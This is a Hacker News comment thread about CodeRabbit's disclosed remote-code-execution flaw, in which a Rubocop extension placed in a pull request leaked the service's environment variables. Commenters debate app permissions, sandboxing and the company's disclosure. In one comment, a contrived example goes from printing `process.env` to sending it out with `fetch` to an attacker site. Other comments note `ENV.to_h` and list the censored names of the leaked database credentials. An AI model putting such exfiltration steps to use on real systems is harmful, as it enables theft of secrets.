if op is reading the comments here: the screenshot where CodeRabbit has discovered the security vulnerability in the PR contains the actual ip address the env vars were sent to. No big deal, just you carefully used 1.2.3.4 in the rest of the article only to leak it in the screenshot. fyi.
reply
hahn-kev
3 days ago
[-]
Why does CodeRabbit need write access to the git repo? Why doesn't Github let me limit it's access?
reply
dpcx
3 days ago
[-]
Because it has the ability to write tests for the PR in question.
reply
tadfisher
3 days ago
[-]
Then it should open a PR for those tests so it can go through the normal CI and review process.
reply
tedivm
3 days ago
[-]
Doing that requires write access if you're a Github Application. You can't just fork repositories back into another org, since Github Applications only have the permissions of the single organization that they work with. Rulesets that prevent direct pushes to specific branches can help here, but have to be configured for each organization.
reply
dpcx
3 days ago
[-]
It updates the existing PR with the tests, I believe. They'd still get reviewed and go through CI.
reply
tadfisher
3 days ago
[-]
Right, the downside being that the app needs write access to your repository.
reply
rahkiin
3 days ago
[-]
Writing to PR branches should really be some new kind of permission.
reply
flippyhead
3 days ago
[-]
It's more than that. If can suggest fixes which you can directly commit.
reply
dpacmittal
3 days ago
[-]
I hope the author received a nice well deserved bounty for this find. Could have been catastrophic in the wrong hands.
reply
cube00
3 days ago
[-]
When they're spinning it [1] as a PR opportunity with no mention of the breach there won't be a bounty.

[1]: https://news.ycombinator.com/item?id=44954242

reply
eranation
3 days ago
[-]
This is very similar to a CVE I discovered in cdxgen (CVE-2024-50611), which is similar to another CVE in Snyk's plugin (CVE-2022-24441). tl;dr if you run a scanner on untrusted code, ensure it doesn't have a way of executing that code.

Some ways to prevent this from happening:

1. Don't let spawned processes have access to your env, there are ways to allowlist a set of env vars that are needed for a sub process in all major languages

2. Don't store secrets in env vars, use a good secrets vault (with a cache)

3. Tenant isolation as much as you can

4. And most obviously - don't run processes that can execute the code they are scanning, especially if that code is not your code (harder to tell, but always be paranoid)

reply
curuinor
3 days ago
[-]
hey, this is Howon from CodeRabbit here. we wish to note that this RCE was reported and fixed in January. it was entirely prospective and no customer data was affected. we have extensive sandboxing for basically any execution of anything now, including any and every tool and all generated code of any kind under the CodeRabbit umbrella.

if you want to learn how CodeRabbit does the isolation, here's a blog post about how: https://cloud.google.com/blog/products/ai-machine-learning/h...

reply
mpeg
3 days ago
[-]
Where can we find the blog post you made back in January about the RCE fix explaining what measures you took to check if any customer data had been affected?
reply
cleverwebb
3 days ago
[-]
how do you know that no customer data was affected? did you work with github and scan all uses of your keys? how do you know if a use of your github key was authentic or not? did you check with anthroipic/openai/etc to scan logs usage?

It's really hard to trust a "hey we got this guys" statement after a fuckup this big

reply
Xunjin
3 days ago
[-]
That's why countries should start to legislate on these matters, there are no incentives in focusing on security and properly report to the customers such vulnerability.
reply
thyrfa
3 days ago
[-]
How can you guarantee that nobody ripped the private key before the researcher told you about the issue though?
reply
KingOfCoders
3 days ago
[-]
Or has a backdoor installed somewhere?
reply
blibble
2 days ago
[-]
if they can't guarantee this then every single repo that had coderabbit is potentially compromised
reply
frankfrank13
3 days ago
[-]
Reading this, its not clear how your blog posts relates:

1. You run git clone inside the GCR function, so, you have at the very least a user token for the git provider

2. RCE exploit basically used the external tools, like a static analysis checker, which again, is inside your GCR function

3. As a contrived example, if I could RCE `console.log(process.env)` then seemingly I could do `fetch(mywebsite....`

I get it, you can hand wave some amount of "VPC" and "sandbox" here. But, you're still executing code, explicitly labeling it "untrusted" and "sandboxed" doesn't excuse it.

reply
progbits
2 days ago
[-]
> no customer data was affected

Someone could have taken the private github key and cloned your customers' private repos.

You would need to audit every single access to github made via your app since the beginning and link it somehow to your side. Did you do this?

reply
yunohn
3 days ago
[-]
While I fully understand that things sometimes get missed, it just seems really bizarre to me that somehow “sandboxing/isolation” was never considered prior to this incident. To me, it feels like the first thing to implement in a system that is explicitly built to run third party untrusted code?
reply
wging
3 days ago
[-]
The article seems to imply that something of the sort had actually been attempted prior to the incident, but was either incomplete or buggy. I'm not sure the details would be entirely exculpatory, but unless you want to flatly disbelieve their statements, "not considered" isn't quite right.

> After responsibly disclosing this critical vulnerability to the CodeRabbit team, we learned from them that they had an isolation mechanism in place, but Rubocop somehow was not running inside it.

reply
roywiggins
3 days ago
[-]
It seems to me that they thought the linter would be safe to run as it wasn't meant to actually run untrusted code, just statically analyze it.
reply
elpakal
3 days ago
[-]
> Sandboxing: All Cloud Run instances are sandboxed with two layers of sandboxing and can be configured to have minimal IAM permissions via dedicated service identity. In addition, CodeRabbit is leveraging Cloud Run's second generation execution environment, a microVM providing full Linux cgroup functionality. Within each Cloud Run instance, CodeRabbit uses Jailkit to create isolated processes and cgroups to further restrict the privileges of the jailed process.

In case you don't want to read through the PR

reply
0x457
3 days ago
[-]
I don't get it, if you're running on linux then just use Landlock LSM inside a VM.
reply
KingOfCoders
3 days ago
[-]
The chuzpe to use this as PR.
reply
woodruffw
2 days ago
[-]
Off topic, but: chutzpah is the conventional English spelling :-)

Edit: I'm this old when I learned that Germans spell it "chuzpe."

reply
KingOfCoders
2 days ago
[-]
I'm this old to learn that the Yiddish spelling is chutzpe with a `T` (thought it would be Chuzpe).
reply
Xunjin
3 days ago
[-]
Silicon Valley sitcom comedy moment right here.
reply
tadfisher
3 days ago
[-]
But do you still store your GH API private key in environment variables?
reply
curuinor
3 days ago
[-]
hey, this is Howon from CodeRabbit. We use a cloud-provider-provided key vault for application secrets, including GH private key.
reply
musicnarcoman
3 days ago
[-]
So the CodeRabbit application with access to application secrets still runs in the same virtual machine as untrusted code from the outside?
reply
megamorf
2 days ago
[-]
Howon, you can stop posting that canned response. It's not helping the discussion in any way and matches the lack of detail the other commenters have pointed out.
reply
smsm42
2 days ago
[-]
The word "now" here is kinda worrying tbh. How was it a good idea to release and sell this product before it has been the case?
reply
jsbg
3 days ago
[-]
wild to comment this
reply
cleverwebb
3 days ago
[-]
I had a visceral and (quite audible) reaction when I got to the environment variable listing.
reply
curuinor
3 days ago
[-]
hey, this is Howon from CodeRabbit. We use a cloud-provider-provided key vault for application secrets, including GH private key.
reply
tnolet
3 days ago
[-]
what does that mean? Were the leaked keys irrelevant?
reply
hotsauceror
3 days ago
[-]
This is the third or fourth time you’ve spammed this exact comment in response to people’s perfectly legitimate questions. What is this clown-show bullshit?
reply
username223
2 days ago
[-]
That's some next-level incompetence:

1. Allow poorly-vetted third-party tools to run in CodeRabbit's privileged environment. The exploit used a Ruby code analysis tool that was probably written 15 years ago and meant to be run locally by trusted developers, who already had access to /bin/sh.

2. Ask for coarse-grained permission to access and modify others' code without any checks.

Either of those by itself would be bad enough. The future looks bright for black or white hats who understand computers.

reply
socalgal2
2 days ago
[-]
I've ranted about this before and been downvoted, ignored as "not an issue" but, IMO, Github is majorly to blame for this. They under-invested in their permission system so 3rd party apps are effectively encouraged to ask for "root" permissions.

Effectively, many (most?) 3rd party github integrations basically ask you to type in your github ID. Then they use the github API and ask for maximal permissions. This lets them make it easy for you to use their services because they can do all the rest of the setup for you. But, NO ONE SHOULD EVER GIVE THIS KIND OF PERMISSION.

Any 3rd party service that said "give us root to your servers" would be laughed out of the market. But, that's what github has encouraged because their default workflow leaves it up to the developer to do the right thing.

Instead, github's auth UX should (1) require you to choose repos (2) not allow picking "all repos" (3) require to you select each and every permission (4) not have an option for "all permissions".

As an analogy (though poor). iOS and MacOS don't say "this app wants all these permissions, yes/no" (android used to do this). Instead, they ask one at a time (camera? mic? photos? network?) etc... I'm not suggesting that github ask one at a time. I am suggesting that github provide a default UI that lists all the permissions, per repo, and has no way to auto-populate it so the user is required to choose.

Further, I would argue that github should show the integrations and permissions for any repo. The hope being if I see "lib X uses integration Y with write permission" then I know lib X is not trustworthy because it's open to supply chain attacks (more than lib Z which has no write integrations)

reply
pabs3
2 days ago
[-]
Developer tools really need to be more mindful of the fact that on developer machines, the current directory should not be trusted, and arbitrary code should not be executed from it. The git project has been learning this the hard way, and others should too.

For check-all-the-things (meta-linter), we disable the rubocop default config file using the "--config /dev/null" options.

reply
edm0nd
3 days ago
[-]
No bounty was paid for this?
reply
cube00
3 days ago
[-]
I can't say I'm surprised they didn't pay a bounty when they couldn't even own up to this on their own blog [1].

Instead they took it as an opportunity to market their new sandboxing on Google's blog [2] again with no mention of why their hand was forced into building the sandboxing they should have had before they rushed to onboard thousands of customers.

I have no idea what their plan was. They had to have known the researchers would eventually publish this. Perhaps they were hoping it wouldn't get the same amount of attention it would if they posted it on their own blog.

[1]: https://news.ycombinator.com/item?id=44954560

[2]: https://news.ycombinator.com/item?id=44954242

reply
mpeg
3 days ago
[-]
First thing I looked for... this is an absolutely critical vulnerability that if exploited would have completely ruined their business. No bounty!?
reply
vntok
3 days ago
[-]
Why would they pay anything? The researchers offered them the vuln analysis for free, unprompted.

If anything, they got paid in exposure.

reply
cube00
3 days ago
[-]
Let's hope the grants keep coming in because those researchers will start getting offers from the darker corners of the web if bounties aren't paid.
reply
iTokio
3 days ago
[-]
That’s why I’m worried about the growing centralization of things such as Chrome, Gmail, AWS, Cloudflare…

It’s very efficient to delegate something to one major actor but we are introducing single points of failure and are less resilient to vulnerabilities.

Critical systems should have defenses in depth, decentralized architectures and avoid trusting new providers with too many moving parts.

reply
ewok94301
2 days ago
[-]
While GitHub needs to invest in finer grained permissioning, I do think there’s lots of lessons for companies building with and customers using GitHub App based deployments. Jotted down my thoughts here https://www.endorlabs.com/learn/when-coderabbit-became-pwned...
reply
elpakal
2 days ago
[-]
So if their GH API token with access to million plus repos was this easy to compromise, isn't it plausible that their token could have been used to clone clone said repos? Is it possible to audit the clone history of a token?
reply
kmarc
2 days ago
[-]
My nightmare is that one of those auto updating vim/vscode/your-favorite-IDE plug-ins That many of us happily use on all the monorepos we work on, at one point invoke a "linter" (or as in this case, configure a linter maliciously) and we start leaking the precious IP to random attackers :-(

In fact, I use rubocop every day lately LOL

reply
t0duf0du
2 days ago
[-]
Even with proper sandboxing, storing all sensitive credentials as environment variables is still a security anti-pattern. ENV vars are too easily accessible - any process can just run ENV.to_h and dump everything.
reply
curuinor
3 days ago
[-]
reply
marksomnian
2 days ago
[-]
If I were a CodeRabbit customer, I'd still be pretty concerned after reading that.

How can CodeRabbit be certain that the GitHub App key was not exfiltrated and used to sign malicious tokens for customer repos (or even used for that in-situ)? I'm not sure if GitHub supports restricting the source IPs of API requests, but if it does, it'd be a trivial mitigation - and one that is absent from the blog post.

The claim that "no malicious activity occurred" implies that they audited the activities of every repo that used Rubocop (or any other potential unsandboxed tool) from the point that support was added for it until the point that the vulnerability was fixed. That's a big claim.

And why only publish this now, when the Kudelski article makes it to the top of HN, over six months after it was disclosed to them?

reply
jatins
2 days ago
[-]
> No customer data was accessed and the vulnerability was quickly remediated within hours of disclosure

How do they know this -- Do they have any audit logs confirming this? A malicious actor could have been using this for months for all they know

reply
oblio
2 days ago
[-]
> How do they know this

They know because it would affect their fundraising, so obviously customer data wasn't affected.

reply
sitzkrieg
3 days ago
[-]
comically bad. get used to more of this
reply
kachapopopow
3 days ago
[-]
Unrelated to the article, but the first time I saw them was in a twitter ad with a completely comically bull** suggestion. I cannot take a company seriously that had something like that inside an ad that is supposed to show the best they're capable of.
reply
nodesocket
2 days ago
[-]
How are they getting access to the PostgreSQL database, unless this running code can communicate with it? That’s a big red flag, user provided code should always be sandboxed and isolated right?
reply
megamorf
2 days ago
[-]
The exfiltrated environment variables contained these entries:

``` "POSTGRESQL_DATABASE": "(CENSORED)", "POSTGRESQL_HOST": "(CENSORED)", "POSTGRESQL_PASSWORD": "(CENSORED)", "POSTGRESQL_USER": "(CENSORED)", ```

reply
nodesocket
2 days ago
[-]
Sure, but connections from these worker machines shouldn’t be allowed directly to the database.
reply
_pdp_
2 days ago
[-]
Amateur level of security - what more is there to say?
reply
viraptor
2 days ago
[-]
The bigger the system, the more "amateur level of security" issues you'll find. It's not really a skill problem on its own.
reply
pengaru
3 days ago
[-]
This third party app gets write access to your repository, so it can do automated reviews of PRs?

Why would you even grant it such permissions? this is ridiculous.

reply
kmarc
2 days ago
[-]
Besides that this was clearly a security f*ckup, in my mind it's almost equivalent to running those third party liters in our Internet-connection-enabled editors and IDEs. Other than one banking project, I don't think I ever had to sandbox my editor in any way.

Scary.

reply
mariocandela
2 days ago
[-]
I'm sorry about Coderabbit's reputation, it's really a great project!
reply
KingOfCoders
2 days ago
[-]
They let the static tool get its config from the PR? Is this madness?

Or did I read the article wrong?

reply
megamorf
2 days ago
[-]
The security researcher noticed that CodeRabbit runs linters against your code base and noticed that Rubocop was among the provided linters. Rubocop supports extensions that contain custom code, so he crafted an extension that exfiltrated the environment variables of the running Rubocop process when it linted the contents of his PR.
reply
KingOfCoders
2 days ago
[-]
But where does the configuration for Rubocop come from? From CodeRabbit (e.g. you configure it on their server for your repo), from the repository or (new) config files in the PR?
reply
rglynn
1 day ago
[-]
Both the repo and new config in the PR.
reply
KronisLV
2 days ago
[-]
> Instead, it would be best to assume that the user may be able to run untrusted code through these tools. So, running them in an isolated environment, with only the minimum information required to run the tools themselves, and not passing them any environment variables would be much better. Even if arbitrary code execution would be possible, the impact would be much less severe.

> For defense in depth, one should add a mechanism that prevents sending private information to an attacker-controlled server. For example, only allow outgoing traffic to whitelisted hosts, if possible. If the tool doesn’t require internet access, then all network traffic may even be disabled in that isolated environment. This way it would make it harder for an attacker to exfiltrate secrets.

I yearn to live in a world where this is the default or at least REALLY EASY to do, where you just fall into the pit of success.

And yet, we live in a borderline insane world where one key getting leaked can pwn a million repos - if nothing else, there should be one key per interaction with account/repo. Not to mention that Rubocop (and probably other tools, eventually) have arbitrary code execution as a feature.

I don't think that CodeRabbit messed up, as much as everything around them is already messed up.

reply
thewisenerd
3 days ago
[-]
global scoped installations or keys always scare me for this reason

i believe the answer here was to exchange the token for something scoped to the specific repo coderabbit is running in, but alas, that doesn't remove the "RCE" _on_ the repo

reply
tadfisher
3 days ago
[-]
They do that, this is how GH apps work. There is no reason to expose the app's private key in the environment for the code that actually runs on the PR.
reply
thewisenerd
3 days ago
[-]
even if they did not have the PEM file left in the environment, the token is still widely scoped and has the same scope as the PEM

what i'm clearly mis-remembering is being able to exchange the token for a smaller scope e.g., hey~ sign this jwt, with scopes=[org/repo1, org/repo2, permissions=write]

reply
deathanatos
2 days ago
[-]
> the token is still widely scoped and has the same scope as the PEM

What the person above you is trying to tell is you is that no, it doesn't.

The authentication flow is that the private key is used to sign an initial JWT; that gets you access to some GH API calls. From there you exchange that JWT for an access token with smaller scope, scoped only to the installation in question.

While the tool execution environment ought to have had none of the credentials, there is the possibility of only holding onto the installation access token.

reply
thewisenerd
2 days ago
[-]
ah; understood. assuming PEM leakage aside

the scope of the exchanged token is the scope of the installation (org / repo); thereby limiting exposure already

to further reduce the scope of exposure, the jwt would've needed to be exchanged with the specific `repositories` (given most installations are org scoped) and `permissions`

https://docs.github.com/en/apps/creating-github-apps/authent...

reply
ianbutler
2 days ago
[-]
If you're a concerned user and you're looking for a solution founded by 2 people with a security background who have sandboxed execution (and network limited) so stuff like this can't happen you should check us out.

We even offer a self hosted deployment which sidesteps this entirely. (feel free to reach out).

www.bismuth.sh

reply
dominodave01
2 days ago
[-]
this spiraled fast
reply
eoncode
2 days ago
[-]
for the author of the page, check the screenshot under "context is key", i think you missed censoring a public ip.
reply
gregjw
2 days ago
[-]
yikes!
reply
binarydreams
3 days ago
[-]
I've noticed CodeRabbit at times does reviews that are super. It is able to catch bugs that even claude code misses on our Github PRs. Blows my mind at times tbh.

Based on the env vars seems like they're using anthropic, openai, etc. only?

reply
tnolet
3 days ago
[-]
Interesting. We removed it as it was mostly too verbose, catching too many false positives and never really added anything useful.
reply
flippyhead
3 days ago
[-]
You can comment on this in the PR and supposedly it'll remember and get better.
reply
jacobsenscott
3 days ago
[-]
> catch bugs that even claude code misses on our Github PRs

Is that good? I assume it just catches a different 10% of the bugs.

reply